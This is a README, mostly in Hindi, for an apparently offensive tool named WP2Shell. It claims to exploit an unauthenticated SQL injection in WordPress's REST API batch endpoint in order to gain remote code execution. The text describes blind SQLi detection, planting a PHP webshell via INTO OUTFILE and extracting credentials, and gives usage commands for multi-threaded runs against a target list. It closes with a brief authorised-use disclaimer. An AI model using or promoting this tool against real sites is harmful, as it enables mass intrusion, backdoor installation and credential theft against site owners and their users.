
WP2Shell - CVE-2026-63030 / CVE-2026-60137 यह टूल WordPress REST API के `/wp-json/batch/v1` एंडपॉइंट में एक गंभीर SQL इंजेक्शन भेद्यता का शोषण करता है, जो बिना प्रमाणीकरण वाले हमलावरों को मनमानी SQL क्वेरी निष्पादित करने और असुरक्षित WordPress इंस्टॉलेशन पर रिमोट कोड एक्सीक्यूशन (RCE) प्राप्त करने की अनुमति देता है।
WordPress REST API Batch एंडपॉइंट भेद्यता के लिए पूर्ण डिस्कवरी और शोषण उपकरण।
यह उपकरण WordPress REST API /wp-json/batch/v1 एंडपॉइंट में एक गंभीर SQL इंजेक्शन भेद्यता का शोषण करता है, जिससे बिना प्रमाणीकरण के हमलावर मनमानी SQL क्वेरीज़ निष्पादित कर सकते हैं और असुरक्षित WordPress इंस्टॉलेशनों पर रिमोट कोड निष्पादन (RCE) प्राप्त कर सकते हैं।
भेद्यता: CVE-2026-63030 / CVE-2026-60137
वेक्टर: WordPress REST API Batch एंडपॉइंट (/wp-json/batch/v1) SQL इंजेक्शन
प्रभाव: बिना प्रमाणीकरण के RCE
प्रभावित संस्करण: WordPress 6.4.x और पुराने (विशिष्ट संस्करण बाद में निर्धारित किए जाएंगे)
SLEEP() पेलोड का उपयोग करके समय-आधारित ब्लाइंड SQL इंजेक्शन का पता लगानाORDER BY प्रोबिंग के माध्यम से तालिका संरचना निर्धारित करता हैINTO OUTFILE के माध्यम से PHP वेबशेल लिखता है (जब अनुमति हो)# Clone the repository
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Install dependencies
pip install requests beautifulsoup4
# Create targets file
echo "https://target.com" > targets.txt
# Run discovery
python wp2shell.py targets.txt --scan --verbose
# Full exploitation
python wp2shell.py targets.txt --exploit --verbose
# Scan single target with verbose output
python wp2shell.py targets.txt --exploit --verbose
# Custom sleep time for slow servers
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Multi-threaded scanning (20 threads)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Skip shell writes (extract credentials only)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Force specific HTTP method
python wp2shell.py targets.txt --exploit --method POST --verbose
1- JSON रिपोर्ट: भेद्यता स्थिति और निकाले गए क्रेडेंशियल्स के साथ संरचित डेटा
2- HTML रिपोर्ट: क्लिक करने योग्य शेल URL के साथ सुंदर, रंग-कोडित विज़ुअलाइज़ेशन
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। केवल उन सिस्टम पर उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।